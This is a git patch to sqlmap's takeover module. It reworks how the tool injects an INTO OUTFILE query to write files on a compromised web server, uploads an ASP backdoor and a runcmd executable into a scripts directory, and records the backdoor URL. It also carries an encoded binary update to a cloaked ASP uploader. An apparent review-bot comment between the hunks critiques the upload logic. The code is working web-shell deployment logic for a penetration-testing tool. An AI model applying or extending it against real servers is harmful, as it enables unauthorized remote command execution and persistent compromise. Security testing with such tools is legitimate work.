From 24d3e24db01a4c8421f517c343b4210b5fb6c8c2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 25 Feb 2010 12:16:49 +0000
Subject: [PATCH] more updates regarding --os-shell feature

---
 lib/takeover/web.py | 33 ++++++++++++++++-----------------
 shell/uploader.asp_ | Bin 1223 -> 1262 bytes
 2 files changed, 16 insertions(+), 17 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 0a630adb5..4eb61c9bd 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -111,7 +111,7 @@ class Web:
 def __webFileInject(self, fileContent, fileName, directory):
 outFile = posixpath.normpath("%s/%s" % (directory, fileName))
- uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
+ uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
 query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
 query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
 query = agent.prefixQuery(" %s" % query)
@@ -200,24 +200,23 @@ class Web:
 logger.info(infoMsg)
 if self.webApi == "asp":
- scriptsDirectory = "Scripts"
 runcmdName = "tmpe%s.exe" % randomStr(4)
 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
- backdoorUploaded = False
- for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
- backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
- backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
- backdoorStream.file.truncate()
- backdoorStream.read()
- backdoorStream.seek(0)
- backdoorStream.write(backdoorContent)
- if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
- self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
- self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
- self.webDirectory = backdoorDirectory
- backdoorUploaded = True
- break
- if not backdoorUploaded:
+ match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+ if match:
+ backdoorDirectory = match.group(1)
+ else:
+ continue
+ backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+ backdoorStream.file.truncate()
+ backdoorStream.read()
+ backdoorStream.seek(0)
+ backdoorStream.write(backdoorContent)
+ if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+ self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+ self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
+ self.webDirectory = backdoorDirectory
+ else:
 continue
 elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
 warnMsg = "backdoor hasn't been successfully uploaded "
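Review bot: The result of the second `self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)` call on the new side is discarded, so when that second upload fails `webBackdoorUrl` and `webDirectory` are still set and the loop proceeds as if everything succeeded; guard it like the first call, e.g. `if not self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory): continue` placed before the two assignments. The directory is now taken from the server's response (the `scriptsdir` hidden field) while the URL still hard-codes `/Scripts/`, so a response reporting any other directory yields a `webBackdoorUrl` that does not correspond to `webDirectory`; either derive the URL segment from the same value or add a comment stating why `Scripts` is assumed to be the matching virtual path. `re` and `uplPage` are both used here but neither is defined within the hunk, so please confirm `re` is imported at the top of the file and that `uplPage` is assigned on every path through the enclosing loop before this point. The enclosing method begins and ends outside this hunk.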
diff --git a/shell/uploader.asp_ b/shell/uploader.asp_ index d91b4c706e296360ebe83f40a5f62b1a680a8012..6ca1cee1ea43ae47bba5deaa3510dfeba89fd6ba 100644 GIT binary patch literal 1262 zcmVED-%@K=1#AzxV&(FM0&qMe9+k3TKX* z&7{Fwkdquc7NcuW`|hKYb#nC5?sY;SXYADT^NXM4eCm^-0+RRE$ESm~0RFa1rYk?DH{o|9jH z^q7o)YP0sH1tIe|c*@fm1D^=GTA<|$E*6YujyNf8y)wTPBMM>q9tlHM;|2jm&DFI7 zfU3YUurICFm9v><(U`0#hW_HNhyfw+wk8-1^wP}zf*DtAMC+x2l1Jhv)u@1nWUbMt z;N3bIuETp$w8$opNmXne21o~yS)+p*U_+L4Xe-fMJ)I}1a`uNx|ug7Iz zDt6WjOB-}-zgmGWfaB6VEyuPQqE=|OAoYzI?d)8jj2-i5MB#10;@66EU8-{-a*-T+ z9jK*lI}J#6qn5K+ku)^!m#K#zu5Q)1k29qe9hO1~ipb%un+^$fSmqT7rI_#AJ!v0p`O+9bh zCVoChL;}?)UJwL}&VC3^oY6J;-kySPT|U%I%nR()DYnSU9h(CCbVg+tH%m%}!-aG3 z(=0f!#~h|zB>h6sT?M0lW+wWWex2Mfg0^&wItljsB(hOjG56+SS`v6Tq`$oKH4vrKrbcPMDM-2K4VTsjg>JtatBr}QJjP_R-!NL zH`Sn$l%~gV6Fz}mO#-w<)4X=0?tZ;7ps(JTStwF`PhR){BV!)9Pr&va8}of^j(-I% zM(?m0?DUT5t2h8aU!_Q$38i5|rzH+&p?h6tAbt~$JJ-88zDvw|e;&9Hm6l^SPV?%? zF7#o>fD-EoAC6}CiFW!W z$w`H#1Ks6_AwUk2*@#o5N$a$U%TX{d#hw0)rt9a~mE!l`Gj-hNKd zL4h}sHC8FIaY)?SGq#ldKa!p^nJDJru7QE4cD7fJuIAa;$oSYG?AuYB2&ud|jb#oq`#?5~l6O zQhZAJ+=n_>>%(Xwykme}jvl*hXg%x(qR54Q+wesAsuQ0VRc?c YTumFTX-g==9&P_<4LV0JkS@?~T2j?m)Bpeg literal 1223 zcmV;&1UUOWB^O3cJ|ED-%@K=1#AzxV&(FM3825|#z(%()k6 zOR$n#Su>hVFl|j7H<%V>XFNWMv^kn~UVG6j@p?-Esp(4vk1tDjsDFQdc5jd@R-?(F zIO;!5O?f|Ofto*Kz;1#aetbD2Ofsr9g~-w2hAfca?E9y~OryFxuqhv+ zY1vQfPxDSMn{2_n9Xp!UqA|>BmF}sc{9!_7GVMRfk#_@@Mjcm-_p0MOXM(pP)t}Ci zmJ9#{&ywbzbU+Z!WfYjFhZBmXBsJM9$%Z^l2?QchosoX0d`*G)ay4uoJmt=lc6oLE z(ruPPOiFGywC?^h%+mTm9|gUk=+>jdd@7epTPoZtnoq2iWj5KZFL-x_ZcJPsLx0rx|C(%@kBXJdrnov^GE<0i0#bQ1kjbR*joEa;XlG1gZL11L&s=+=z83$j+Zr6PDLC0U5 z<_{(BlQJeqNu!HD9WMB=S=$GS2d23sd7RKAT^sP1LUXLD9WRr|(+*b5$d=5v5lkFg zPFEy(Op!@NJ)o#o49ufEF&tWR{+l56O7O>mvs(!8J%Z&Sitgc<-}WlF)*6w4y*2Z_ z0y|whgPa&n*VCM>5{Zo6G60QQoH3<#d4_<}6QP7wfj}Noik3ZH^g*nKaE8`r8D}}X zc<_+#$~RA07tw$7*;0O}akJN2>btWunEe7&r#2WL~Y9u^)<(x5(a zrG@SddS>=Xw83N!M~#&+IC2OUE>WC>GFGB5>^Ie*nk{i-*c~6*Yyr4KSLJ@__J8hH 
z#9<4)PO{KUePTc%>4Zl;`^~$iQ9psUAAF&At~Y`aL4g<(4E(F+cmf*nM6OXi^bT_` zf^Ky8UrfI{$J82;Z=hlnjw~j^3!&xV&7}Q#xoum3J5bnkvB7Qjai?Pwa+2`wG1WYi zA3}MkW7IC%J5vBfe-h*i-g5X3iFVBj%U?re-TWlON<$kJD^_}1Y%7GmoRzB`?0MLY zUC4xKpoNo^eW4B=T9&X1S)JVAPxEB@czQ*t)daC|id)i|7Ay6AHJn2PD6Ydrd3mHx z7pmaxZkxCnYszWC@StA94|rMt!DSN|26U+vJ%TsVfh}ipjD4bOiuIs( zIjpdAH+ek~(2Fis8q-lKbS?FWum~mV4bc*=Uv4;0+$CwhSF(6VUdHqj+~i|ES*#Ek l=YcKD)z~{5aph;7T&+zdg{)EKNQA%Q?l-4(ZGUkQ)4